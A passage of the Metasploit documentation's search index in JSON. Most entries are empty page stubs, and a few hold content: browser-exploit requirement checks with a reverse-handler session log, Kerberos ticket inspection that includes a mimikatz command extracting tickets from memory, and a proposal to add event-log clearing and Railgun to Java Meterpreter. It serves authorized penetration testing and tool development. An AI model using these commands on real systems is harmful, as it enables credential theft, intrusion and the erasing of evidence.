    "relUrl": "/docs/using-metasploit/other/"
  },"462": {
    "doc": "Intermediate",
    "title": "Intermediate",
    "content": " ",
    "url": "/docs/using-metasploit/intermediate/",
    "relUrl": "/docs/using-metasploit/intermediate/"
  },"463": {
    "doc": "Using Metasploit",
    "title": "Using Metasploit",
    "content": " ",
    "url": "/docs/using-metasploit/",
    "relUrl": "/docs/using-metasploit/"
  },"464": {
    "doc": "Module metadata",
    "title": "Module metadata",
    "content": " ",
    "url": "/docs/development/developing-modules/module-metadata/",
    "relUrl": "/docs/development/developing-modules/module-metadata/"
  },"465": {
    "doc": "Scanners",
    "title": "Scanners",
    "content": " ",
    "url": "/docs/development/developing-modules/guides/scanners/",
    "relUrl": "/docs/development/developing-modules/guides/scanners/"
  },"466": {
    "doc": "Guides",
    "title": "Guides",
    "content": " ",
    "url": "/docs/development/developing-modules/guides/",
    "relUrl": "/docs/development/developing-modules/guides/"
  },"467": {
    "doc": "Compiling C",
    "title": "Compiling C",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/c/",
    "relUrl": "/docs/development/developing-modules/libraries/c/"
  },"468": {
    "doc": "HTTP",
    "title": "HTTP",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/http/",
    "relUrl": "/docs/development/developing-modules/libraries/http/"
  },"469": {
    "doc": "Deserialization",
    "title": "Deserialization",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/deserialization/",
    "relUrl": "/docs/development/developing-modules/libraries/deserialization/"
  },"470": {
    "doc": "Obfuscation",
    "title": "Obfuscation",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/obfuscation/",
    "relUrl": "/docs/development/developing-modules/libraries/obfuscation/"
  },"471": {
    "doc": "SMB Library",
    "title": "SMB Library",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/smb_library/",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/"
  },"472": {
    "doc": "Libraries",
    "title": "Libraries",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/",
    "relUrl": "/docs/development/developing-modules/libraries/"
  },"473": {
    "doc": "External Modules",
    "title": "External Modules",
    "content": " ",
    "url": "/docs/development/developing-modules/external-modules/",
    "relUrl": "/docs/development/developing-modules/external-modules/"
  },"474": {
    "doc": "Developing Modules",
    "title": "Developing Modules",
    "content": " ",
    "url": "/docs/development/developing-modules/",
    "relUrl": "/docs/development/developing-modules/"
  },"475": {
    "doc": "Roadmap",
    "title": "Roadmap",
    "content": " ",
    "url": "/docs/development/roadmap/",
    "relUrl": "/docs/development/roadmap/"
  },"476": {
    "doc": "Quality",
    "title": "Quality",
    "content": " ",
    "url": "/docs/development/quality/",
    "relUrl": "/docs/development/quality/"
  },"477": {
    "doc": "Git",
    "title": "Git",
    "content": " ",
    "url": "/docs/development/get-started/git/",
    "relUrl": "/docs/development/get-started/git/"
  },"478": {
    "doc": "Get Started",
    "title": "Get Started",
    "content": " ",
    "url": "/docs/development/get-started/",
    "relUrl": "/docs/development/get-started/"
  },"479": {
    "doc": "Proposals",
    "title": "Proposals",
    "content": " ",
    "url": "/docs/development/propsals/",
    "relUrl": "/docs/development/propsals/"
  },"480": {
    "doc": "Process",
    "title": "Process",
    "content": " ",
    "url": "/docs/development/maintainers/process/",
    "relUrl": "/docs/development/maintainers/process/"
  },"481": {
    "doc": "Ruby Gems",
    "title": "Ruby Gems",
    "content": " ",
    "url": "/docs/development/maintainers/ruby-gems/",
    "relUrl": "/docs/development/maintainers/ruby-gems/"
  },"482": {
    "doc": "Maintainers",
    "title": "Maintainers",
    "content": " ",
    "url": "/docs/development/maintainers/",
    "relUrl": "/docs/development/maintainers/"
  },"483": {
    "doc": "Google Summer of Code",
    "title": "Google Summer of Code",
    "content": " ",
    "url": "/docs/development/google-summer-of-code/",
    "relUrl": "/docs/development/google-summer-of-code/"
  },"484": {
    "doc": "Development",
    "title": "Development",
    "content": " ",
    "url": "/docs/development/",
    "relUrl": "/docs/development/"
  },"485": {
    "doc": "Home",
    "title": "Getting Started",
    "content": ". | Setting Up a Metasploit Development Environment | Using Metasploit | Using Git | Reporting a Bug | Navigating and Understanding Metasploit’s Codebase | . ",
    "url": "/#getting-started",
    "relUrl": "/#getting-started"
  },"486": {
    "doc": "Home",
    "title": "Contributing",
    "content": ". | Contributing to Metasploit | Creating Metasploit Framework LoginScanners | Guidelines for Accepting Modules and Enhancements | Common Metasploit Module Coding Mistakes | Style Tips | Committer Rights | Landing Pull Requests | . ",
    "url": "/#contributing",
    "relUrl": "/#contributing"
  },"487": {
    "doc": "Home",
    "title": "Metasploit Development",
    "content": ". | Style Tips | Get Started Writing an Exploit | How to get started with writing an auxiliary module | How to get started with writing a post module | How to get started with writing a Meterpreter script | Running Private Modules | Exploit Ranking | Module Reference Identifiers | How to check Microsoft patch levels for your exploit | How to deprecate a Metasploit module | How to do reporting or store data in module development | How to log in Metasploit | How to obfuscate JavaScript in Metasploit | How to parse an HTTP response | How to Send an HTTP Request Using HTTPClient | How to send an HTTP request using Rex Proto Http Client | How to use command stagers | How to use datastore options | How to use Msf Auxiliary AuthBrute to write a bruteforcer | How to use PhpEXE to exploit an arbitrary file upload bug | How to use Powershell in an exploit | How to use Railgun for Windows post exploitation | How to Use the FILEFORMAT mixin to create a file format exploit | How to use the Msf Exploit Remote Tcp mixin | How to use the Seh mixin to exploit an exception handler | How to use WbemExec for a write privilege attack on Windows | How to write a browser exploit using BrowserExploitServer | How to write a browser exploit using HttpServer | How to write a check method | How to write a HTTP LoginScanner Module | How to write a module using HttpServer and HttpClient | How to zip files with Msf::Util::EXE.to_zip | How to use Metasploit Framework Compiler Windows to compile C code | How to use Metasploit Framework Obfuscation CRandomizer | How to decrypt RC4 with Metasploit Framework Compiler | How to decode Base64 with Metasploit Framework Compiler | How to XOR with Metasploit Framework Compiler | Using ReflectiveDll Injection | Oracle Usage | Definition of Module Reliability, Side Effects, and Stability | How to cleanup after module execution | . ",
    "url": "/#metasploit-development",
    "relUrl": "/#metasploit-development"
  },"488": {
    "doc": "Home",
    "title": "Metasploit Payloads",
    "content": ". | How Payloads Work | Merging Metasploit Payload Gem Updates | Meterpreter Configuration | Meterpreter HTTP Communication | Meterpreter Paranoid Mode | Meterpreter Reliable Network Communication | Meterpreter Sleep Control | Meterpreter Stageless Mode | Meterpreter Timeout Control | Meterpreter Transport Control | Meterpreter Unicode Support | Payload UUID | Python Extension | The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers | . ",
    "url": "/#metasploit-payloads",
    "relUrl": "/#metasploit-payloads"
  },"489": {
    "doc": "Home",
    "title": "Other Metasploit Resources",
    "content": ". | Metasploit 5.0 Release Notes | Downloads by Version | Evading Anti Virus | How to use a Metasploit module appropriately | How to use a reverse shell in Metasploit | Information About Unmet Browser Exploit Requirements | How to use msfvenom | What my Rex Proto SMB Error means | Why CVE Is Not Available | . ",
    "url": "/#other-metasploit-resources",
    "relUrl": "/#other-metasploit-resources"
  },"490": {
    "doc": "Home",
    "title": "GitHub Resources",
    "content": ". | Git Cheatsheet | Git Reference Sites | Remote Branch Pruning | . ",
    "url": "/#github-resources",
    "relUrl": "/#github-resources"
  },"491": {
    "doc": "Home",
    "title": "Home",
    "content": "Welcome to Metasploit-land. Are you a Metasploit user who wants to get started or get better at hacking stuff (that you have permission to hack)? The quickest way to get started is to download the Metasploit nightly installers. This will give you access to both the free, open-source Metasploit Framework and a free trial of Metasploit Pro. If you’re using Kali Linux, Metasploit is already pre-installed. See the Kali documentation for how to get started using Metasploit in Kali Linux. Are you anxious to get your Metasploit Development Environment set up so you can start Landing Pull Requests and contributing excellent exploit code? If so, you’re in the right place. If you’re an exploit developer, you will want to review our Guidelines for Accepting Modules and Enhancements to find out what we expect when we see pull requests for new Metasploit modules. No idea what you should start working on? Check out the guidelines for contributing to Metasploit, and dive into Setting Up a Metasploit Development Environment. ",
    "url": "/",
    "relUrl": "/"
  },"492": {
    "doc": "Information About Unmet Browser Exploit Requirements",
    "title": "Information About Unmet Browser Exploit Requirements",
    "content": "So I see your browser exploit has refused to attack due to some kind of unmet requirements. Typically this means one of the following: . | Your target doesn’t have the right conditions to be exploited. | Your target isn’t vulnerable at all. | . The exploit should say what requirements are not met. The requirements are explained here: . | Key | Description | . | :source | Target has JavaScript disabled. | . | :ua_name | Target isn’t using the preferred browser. For example: Firefox, IE. | . | :ua_ver | Target isn’t using the preferred browser version. | . | :os_name | Target isn’t using the preferred operating system. | . | :os_flavor | This has been deprecated. If you see this, your Metasploit is most likely out of date. | . | :language | Target isn’t using the preferred OS language. | . | :arch | Target isn’t on the preferred architecture. For example: x86/x64 | . | :proxy | Target has a proxy. | . | :silverlight | Target doesn’t have Silverlight installed. | . | :office | Target doesn’t have the preferred version of Microsoft Office installed, so the exploit cannot bypass DEP. | . | :java | Target doesn’t have the preferred version of Java. Often this is used by exploits to bypass DEP. | . | :clsid | Target doesn’t have the preferred ActiveX control. If this is the problem, you will only see a mismatch with :activex instead of :clsid. | . | :method | Target doesn’t have the preferred ActiveX control. If this is the problem, you will only see a mismatch with :activex instead of :method. | . | :mshtml_build | Target isn’t on the preferred build of Internet Explorer. Usually means only specific builds of IE are vulnerable. | . | :flash | Target isn’t using the preferred version of Adobe Flash. Often this is used by exploits to leverage code execution. | . | :vuln_test | A custom JavaScript-based check. There should be a custom vuln_test_error message explaining why on msfconsole. | . How to manually check requirement comparisons: . If you’d like to check the comparisons, simply set VERBOSE to true. The following is an example: . msf exploit(ms13_022_silverlight_script_object) &amp;gt; set VERBOSE true VERBOSE =&amp;gt; true msf exploit(ms13_022_silverlight_script_object) &amp;gt; run [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.64:4444 [*] Using URL: http://0.0.0.0:8080/SHIzaS2aZxIA6 msf exploit(ms13_022_silverlight_script_object) &amp;gt; [*] Local IP: http://192.168.1.64:8080/SHIzaS2aZxIA6 [*] Server started. [*] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Received cookie 'sVfdquJGHzpHyLItxoTgeJI'. [*] 192.168.1.80 ms13_022_silverlight_script_object - Gathering target information. [*] 192.168.1.80 ms13_022_silverlight_script_object - Sending response HTML. [*] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Info receiver page called. [*] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Received cookie 'ZnKtXOQIvxAclSrEOxJ'. [!] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Received sniffed browser data over POST: {\"os_name\"=&amp;gt;[\"Microsoft Windows\"], \"os_flavor\"=&amp;gt;[\"XP\"], \"ua_name\"=&amp;gt;[\"MSIE\"], \"ua_ver\"=&amp;gt;[\"8.0\"], \"arch\"=&amp;gt;[\"x86\"], \"java\"=&amp;gt;[\"null\"], \"silverlight\"=&amp;gt;[\"false\"], \"flash\"=&amp;gt;[\"null\"], \"office\"=&amp;gt;[\"null\"], \"mshtml_build\"=&amp;gt;[\"18702\"]}. [*] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Received cookie 'ZnKtXOQIvxAclSrEOxJ'. [*] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Serving exploit to user with tag ZnKtXOQIvxAclSrEOxJ [*] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Setting target \"ZnKtXOQIvxAclSrEOxJ\" to :tried. [!] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Comparing requirement: source=(?i-mx:script|headers) vs k=script [!] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Comparing requirement: os_name=Microsoft Windows vs k=Microsoft Windows [!] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Comparing requirement: ua_name=MSIE vs k=MSIE [!] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Comparing requirement: silverlight=true vs k=false [!] 192.168.1.80 ms13_022_silverlight_script_object - 192.168.1.80 ms13_022_silverlight_script_object - Comparing requirement: arch=x86 vs k=x86 [!] 192.168.1.80 ms13_022_silverlight_script_object - Exploit requirement(s) not met: silverlight . Related Reading: . | How to write a browser exploit using BrowserExploitServer | . ",
    "url": "/docs/using-metasploit/other/information-about-unmet-browser-exploit-requirements.html",
    "relUrl": "/docs/using-metasploit/other/information-about-unmet-browser-exploit-requirements.html"
  },"493": {
    "doc": "Inspecting tickets",
    "title": "Inspecting Kerberos Tickets",
    "content": "The auxiliary/admin/kerberos/inspect_ticket module allows you to print the contents of a ccache/kirbi file. The module will output ticket information such as: . | Client information | Service information | Ticket creation / expiry times | Decrypted ticket contents - if NTHASH or AESKEY is set | . ",
    "url": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#inspecting-kerberos-tickets",
    "relUrl": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#inspecting-kerberos-tickets"
  },"494": {
    "doc": "Inspecting tickets",
    "title": "Acquiring tickets",
    "content": "Kerberos tickets can be acquired from multiple sources. For instance: . | Retrieved directly from the KDC with the get_ticket module | Forged using the forge_ticket module after compromising the krbtgt or a service account’s encryption keys | Extracted from memory using Meterpreter and mimikatz: | . meterpreter &amp;gt; load kiwi Loading extension kiwi...#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. \"A La Vie, A L'Amour\" - (oe.eo) ## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \\ / ## &amp;gt; http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' &amp;gt; http://pingcastle.com / http://mysmartlogon.com ***/ Success. meterpreter &amp;gt; kiwi_cmd \"sekurlsa::tickets /export\" Authentication Id : 0 ; 1393218 (00000000:00154242) Session : Network from 0 User Name : DC3$ Domain : DEMO Logon Server : (null) Logon Time : 1/12/2023 9:11:00 PM SID : S-1-5-18 * Username : DC3$ * Domain : DEMO.LOCAL * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? [00000000] Start/End/MaxRenew: 1/12/2023 7:41:41 PM ; 1/13/2023 5:37:45 AM ; 1/1/1601 12:00:00 AM Service Name (02) : LDAP ; DC3 ; @ DEMO.LOCAL Target Name (--) : @ DEMO.LOCAL Client Name (01) : DC3$ ; @ DEMO.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac ab64d555f18de6a3262d921e6dc75dcf884852f551db3114f7983dbaf276e1d6 Ticket : 0x00000012 - aes256_hmac ; kvno = 7 [...] ==================== Base64 of file : [0;154242][email protected] ==================== doQAAAYXMIQAAAYRoIQAAAADAgEFoYQAAAADAgEWooQAAAS2MIQAAASwYYQAAASq MIQAAASkoIQAAAADAgEFoYQAAAAMGwpBREYzLkxPQ0FMooQAAAAmMIQAAAAgoIQA AAADAgECoYQAAAARMIQAAAALGwRMREFQGwNEQzOjhAAABFcwhAAABFGghAAAAAMC ... etc... ==================== . Note that tools often Base64 encode the Kirbi content to display to the user. However the inspect_ticket module expects the input file to be in binary format. To convert base64 strings to binary files: . # Linux cat ticket.b64 | base64 -d &amp;gt; ticket.kirbi # Mac cat ticket.b64 | base64 -D &amp;gt; ticket.kirbi # Powershell [IO.File]::WriteAllBytes(\"ticket.kirbi\", [Convert]::FromBase64String(\"&amp;lt;bas64_ticket&amp;gt;\")) . ",
    "url": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#acquiring-tickets",
    "relUrl": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#acquiring-tickets"
  },"495": {
    "doc": "Inspecting tickets",
    "title": "Module usage",
    "content": ". | Start msfconsole | Do: use auxiliary/admin/kerberos/inspect_ticket | Do: set TICKET_PATH /path/to/ccache/file | Optional: either set AES_KEY aes_key_here or set NTHASH nthash_here - which will attempt to decrypt tickets | Do: run to see the contents of the ticket | . ",
    "url": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#module-usage"
  },"496": {
    "doc": "Inspecting tickets",
    "title": "Scenarios",
    "content": "Inspecting Ticket contents . This action allows you to see the contents of any ccache or kirbi file, If you are able to provide the decryption key we can also show the encrypted parts of the tickets. | TICKET_PATH - The path to the ccache or kirbi file. | AES_KEY - (Optional) Only set this if you have the decryption key and it is an AES128 or AES256 key. | NTHASH - (Optional) Only set this if you have the decryption key and it is an NTHASH. No other options are used in this action. | . Without Key . msf6 auxiliary(admin/kerberos/inspect_ticket) &amp;gt; run TICKET_PATH=/path/to/ticket Primary Principal: [email protected] Ccache version: 4 Creds: 1 Credential[0]: Server: cifs/[email protected] Client: [email protected] Ticket etype: 18 (AES256) Key: 3436643936633032656264663030393931323461366635653364393932613763 Ticket Length: 978 Subkey: false Addresses: 0 Authdatas: 0 Times: Auth time: 2022-11-21 13:52:00 +0000 Start time: 2022-11-21 13:52:00 +0000 End time: 2032-11-18 13:52:00 +0000 Renew Till: 2032-11-18 13:52:00 +0000 Ticket: Ticket Version Number: 5 Realm: WINDOMAIN.LOCAL Server Name: cifs/dc.windomain.local Encrypted Ticket Part: Ticket etype: 18 (AES256) Key Version Number: 2 Cipher: 1YrnB+fhzeLEq+4NUcXvoEsSI29+gwCDg3qjYdb0YHhqx23BhZGOK9rIQ99uXeuLHSapJAanCE9g/PyyKDE1kggrEHfy6cxwsP25exmN2w3NXVm7P0PqMVON2RBp2S11eIdF/Zibhrs7JbaaVw0Hv8GpbpHdFI0l6Xx3Jz+y0bqFsFNEsU8nEW35Z3Oo2xpI/xTwNTyG1Bmg+bktSLyI6nEPtJXQKcoJTrNhSBNsZ18HZiUPim9EqSCHUh0VbDeLntryh+lt0TIgwhwipHPWnro+Y81dvX5j8ZeBdgKgnoX3jciU629u/RveQJgyw/vLk1KT0RzTbHSwdRk/xi6ghccvew33TKJ8q3nP/JuSWDzaDE6I6v3KgInSZP+XkCAV5VT//U49MtIVIKARcmtXQwVxztMXKlWjIaxQwl9BN6CuyWZjDcafAssjPWgWIAsesmEWHn3btv1BP0a4gvn5f1b7Fu4Gh6w0ARCryxZkSl+6UhJbcdaRT23WhqN24ECGEl0VIX4fuLs6x0gVtAQ2YsI+HkoQYuI+C28gXzJUCac6rJyFQSTsciwj/jVf18ttw1vfGGKa/BVcqscGZoJPpBiuGPBkIbeAOery0Sjn+0tP0tsPYw1OkpzZ7n/j/YdmTX6UAFZjCLbgvF8hoPyider1gntOiSjlLlEUITLTfe5zqWi4gs47Ly6lvggBWW9Yg0fIaPOHYMvsszMLcJz0+dFXtDVI452LIEatLDvp1aKkwGANWYyRgOMlHR3fD030SOTNEb5oa6WigWZQLlhuDbgrfFaWWAMp7opcNbNKy7Iv17EscL7pW2Ygc38VbmbFtdIfvpQ9niwLr2msjzhB7RPihZXcUAlVygLwykq0JDG4fRmoNXzNydbnYlX9E+KW0fHFjoBitAx1xrp9p5Ajwoyy+wIk0mt/aC4pbfcoRjt4GUF/9DhZnH3HiPn4lM9TLMzpiediEtDZtKgGvAAP2cJZn2gsLRlKAtBZvl+ibe1uDzC9g6rnObAx3c+OSG9rmHzBBCq6D8wW6ZjrQy8njNuriC5rnQxUpVhgGvTOkeTphSIHX+D4SuMd+XZ4zqa3DsrHzIeVWAvrTHCDBzy+DKt2RoQTwYmGT+a0YB0btQtgIfRj2OwDtlP65JUxC+/ANelHg73d0REoYistB5ZMmvk= . With Key . msf6 auxiliary(admin/kerberos/inspect_ticket) &amp;gt; run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket Primary Principal: [email protected] Ccache version: 4 Creds: 1 Credential[0]: Server: cifs/[email protected] Client: [email protected] Ticket etype: 18 (AES256) Key: 3436643936633032656264663030393931323461366635653364393932613763 Ticket Length: 978 Subkey: false Addresses: 0 Authdatas: 0 Times: Auth time: 2022-11-21 13:52:00 +0000 Start time: 2022-11-21 13:52:00 +0000 End time: 2032-11-18 13:52:00 +0000 Renew Till: 2032-11-18 13:52:00 +0000 Ticket: Ticket Version Number: 5 Realm: WINDOMAIN.LOCAL Server Name: cifs/dc.windomain.local Encrypted Ticket Part: Ticket etype: 18 (AES256) Key Version Number: 2 Decrypted (with key: \\x4b\\x91\\x2b\\xe0\\x36\\x6a\\x6f\\x37\\xf4\\xa7\\xd5\\x71\\xbe\\xe1\\x8b\\x11\\x73\\xd9\\x31\\x95\\xef\\x76\\xf8\\xd1\\xe3\\xe8\\x1e\\xf6\\x17\\x2a\\xb3\\x26): Times: Auth time: 2022-11-21 13:52:00 UTC Start time: 2022-11-21 13:52:00 UTC End time: 2032-11-18 13:52:00 UTC Renew Till: 2032-11-18 13:52:00 UTC Client Addresses: 0 Transited: tr_type: 0, Contents: \"\" Client Name: 'Administrator' Client Realm: 'WINDOMAIN.LOCAL' Ticket etype: 18 (AES256) Encryption Key: 3436643936633032656264663030393931323461366635653364393932613763 Flags: 0x50a00000 (FORWARDABLE, PROXIABLE, RENEWABLE, PRE_AUTHENT) PAC: Validation Info: Logon Time: 2022-11-21 13:52:00 +0000 Logoff Time: Never Expires (inf) Kick Off Time: Never Expires (inf) Password Last Set: No Time Set (0) Password Can Change: No Time Set (0) Password Must Change: Never Expires (inf) Logon Count: 0 Bad Password Count: 0 User ID: 500 Primary Group ID: 513 User Flags: 0 User Session Key: \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 User Account Control: 528 Sub Auth Status: 0 Last Successful Interactive Logon: No Time Set (0) Last Failed Interactive Logon: No Time Set (0) Failed Interactive Logon Count: 0 SID Count: 0 Resource Group Count: 0 Group Count: 5 Group IDs: Relative ID: 513, Attributes: 7 Relative ID: 512, Attributes: 7 Relative ID: 520, Attributes: 7 Relative ID: 518, Attributes: 7 Relative ID: 519, Attributes: 7 Logon Domain ID: S-1-5-21-3541430928-2051711210-1391384369 Effective Name: 'Administrator' Full Name: '' Logon Script: '' Profile Path: '' Home Directory: '' Home Directory Drive: '' Logon Server: '' Logon Domain Name: 'WINDOMAIN.LOCAL' Client Info: Name: 'Administrator' Client ID: 2022-11-21 13:52:00 +0000 Pac Server Checksum: Signature: \\x04\\xe5\\xab\\x06\\x1c\\x7a\\x90\\x9a\\x26\\xb1\\x22\\xc2 Pac Privilege Server Checksum: Signature: \\x71\\x0b\\xb1\\x83\\x85\\x82\\x57\\xf4\\x10\\x21\\xbd\\x7e . Both of these examples are printing the contents of the same ccache file and showing the difference in output if you have the decryption key available. ",
    "url": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html#scenarios"
  },"497": {
    "doc": "Inspecting tickets",
    "title": "Inspecting tickets",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/inspect_ticket.html"
  },"498": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "Java Meterpreter Feature Parity",
    "content": "Metasploit Framework has separate Meterpreter implementations for different platforms. Currently there is a feature disparity between e.g. Windows (x86) and PHP, Python and Java. For instance the Java Meterpreter only implements 25% of stdapi on windows, in comparison to the Python Meterpreter’s 50% coverage, or the Window’s Meterpreter at 94% coverage. Java does have out of the box support for many of the library calls that we would require for improving Meterpreter compatibility, i.e. to manipulate the Windows event log, support Railgun etc. To implement feature parity the following pull request were spiked: . | Add clearev command on Windows using JNA - Adding Meterpreter’s event log manipulation commands. Uses an off-the-shelf library for making native system calls via JNA. This approach would allow for implementation of the remaining calls that aren’t supported by Java out of the box. | Add Railgun support to Java Meterpreter against Windows - Using a custom library for Railgun support | . This proposal evaluates different approaches on how this feature parity could be achieved, what difficulties we have faced, and the future work required. ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#java-meterpreter-feature-parity",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#java-meterpreter-feature-parity"
  },"499": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "Glossary",
    "content": ". | FFI - Foreign Function Interface - A foreign function interface (FFI) is a mechanism by which a program written in one programming language can call routines or make use of services written in another. | JNI - Java Native Interface is a foreign function interface programming framework that enables Java code running in a Java Virtual Machine (JVM) to call and be called by native applications (programs specific to a hardware and operating system platform) and libraries written in other languages such as C, C++ and assembly. | JNA - Java Native Access is a community-developed library that provides Java programs easy access to native shared libraries, under the covers it uses still JNI - only supports Java 1.6+ | Railgun - Meterpreter API which allows for programmatic access to native libraries via Ruby. Window’s Implementation is available here. | . ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#glossary",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#glossary"
  },"500": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "Solution Overview",
    "content": "To improve the Java Meterpreter’s feature parity we will: . | Add support for native system calls | Add support for Railgun capabilities | . To implement this functionality we will: . | Use the open source JNA library for generic system calls | Create a custom C library for Railgun support | Update core api to expose system information to deduce the platform type | Update Java stdapi to now include the library files for Railgun + JNA by default, i.e. the dll/so/dylib files for Railgun/JNA - an extra ~200KB uncompressed on top of the existing 54KB compressed (228KB uncompressed) | Load the Railgun/JNA libraries on demand when the Meterpreter command is invoked, for now this will require a write to disk - discussed further below | Update CI/Maven build steps | . Alternative implementation steps are also documented. ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#solution-overview",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#solution-overview"
  },"501": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "Implementation",
    "content": "Supporting native system calls . We will move the OS detection from stdapi to core. This would allow us to detect the victim’s OS and architecture as part of the core API, allowing stdapi to additionally include the correct Railgun and the JNA dll/so/dylib library files. Native call support will be provided by JNA - an open source library which provides easy access to Window’s APIs. Using JNA would help reduce the boilerplate for making Windows API calls, is maintained by an existing community, and is less likely to be detected as malicious. The sequence of steps required for loading stdapi and invoking clear event log: . sequenceDiagram msfconsole-&amp;gt;&amp;gt;+meterpreter: load core library meterpreter--&amp;gt;&amp;gt;-msfconsole: return success and list of available commands msfconsole-&amp;gt;&amp;gt;+meterpreter: get architecture from core library meterpreter--&amp;gt;&amp;gt;-msfconsole: e.g. Windows 10 x64 msfconsole-&amp;gt;&amp;gt;+meterpreter: load stdapi - i.e. classfiles + JNA + Railgun dll meterpreter-&amp;gt;&amp;gt;meterpreter: Load new java commands note right of meterpreter: Keep JNA + Railgun library in memory&amp;lt;br /&amp;gt;Don't load them yet meterpreter--&amp;gt;&amp;gt;-msfconsole: return success and list of available commands msfconsole-&amp;gt;&amp;gt;+meterpreter: clear event log rect rgb(191, 223, 255, .3) note right of meterpreter: Load JNA if it's &amp;lt;br &amp;gt;not been loaded before meterpreter-&amp;gt;&amp;gt;meterpreter: Copy JNA from classpath to file system meterpreter-&amp;gt;&amp;gt;meterpreter: System.load(temp path) meterpreter-&amp;gt;&amp;gt;meterpreter: delete temp path end meterpreter-&amp;gt;&amp;gt;meterpreter: clear event log using JNA meterpreter--&amp;gt;&amp;gt;-msfconsole: clear event log result . Railgun support . Railgun requires access to low-level functionality, i.e. directly manipulating memory etc. Java does not support this functionality directly unless a Java wrapper is provided. Therefore a JNI wrapper for the current Railgun implementation will be developed - similar to the previous prototype. Maven would be updated to build this library for different architectures/platforms. Similar to the implementation of native system calls; We will move the OS detection from stdapi to core. This would allow us to detect the victim’s OS and architecture as part of the core API, allowing stdapi to additionally include the correct Railgun and JNA dll/so/dylib library files. Once a native call needs to be executed, Meterpreter would attempt to load JNA and use it to the native Windows API to begin the process of reflectively loading the compiled Railgun library. The sequence of steps required for loading stdapi and invoking Railgun: . sequenceDiagram msfconsole-&amp;gt;&amp;gt;+meterpreter: load core library meterpreter--&amp;gt;&amp;gt;-msfconsole: return success and list of available commands msfconsole-&amp;gt;&amp;gt;+meterpreter: get architecture from core library meterpreter--&amp;gt;&amp;gt;-msfconsole: e.g. Windows 10 x64 msfconsole-&amp;gt;&amp;gt;+meterpreter: load stdapi - i.e. classfiles + JNA + Railgun dll meterpreter-&amp;gt;&amp;gt;meterpreter: Load new java commands note right of meterpreter: Keep JNA + Railgun library in memory&amp;lt;br /&amp;gt;Don't load them yet meterpreter--&amp;gt;&amp;gt;-msfconsole: return success and list of available commands msfconsole-&amp;gt;&amp;gt;+meterpreter: Railgun call rect rgb(191, 223, 255, .3) note right of meterpreter: Load JNA if it's &amp;lt;br &amp;gt;not been loaded before meterpreter-&amp;gt;&amp;gt;meterpreter: Copy JNA from classpath to file system meterpreter-&amp;gt;&amp;gt;meterpreter: System.load(tempPath) meterpreter-&amp;gt;&amp;gt;meterpreter: tempPath.deleteOnExit() end rect rgb(191, 223, 255, .3) note right of meterpreter: Load Railgun if it's &amp;lt;br &amp;gt;not been loaded before meterpreter-&amp;gt;&amp;gt;meterpreter: Use JNA to reflectively load Railgun end meterpreter-&amp;gt;&amp;gt;meterpreter: invoke Railgun call meterpreter--&amp;gt;&amp;gt;-msfconsole: Railgun result . For an initial release the Railgun and JNA libraries would be sent as part of stdapi. This would increase the size to about 200KB on top of the 70KB Meterpreter Jar (228KB uncompressed). We will also keep Railgun in stdapi (where it currently lives). Alternative Implementation 1 . An alternative solution to updating stdapi to additionally include Railgun/JNA - is to keep stdapi as it exists today, and to attempt loading a 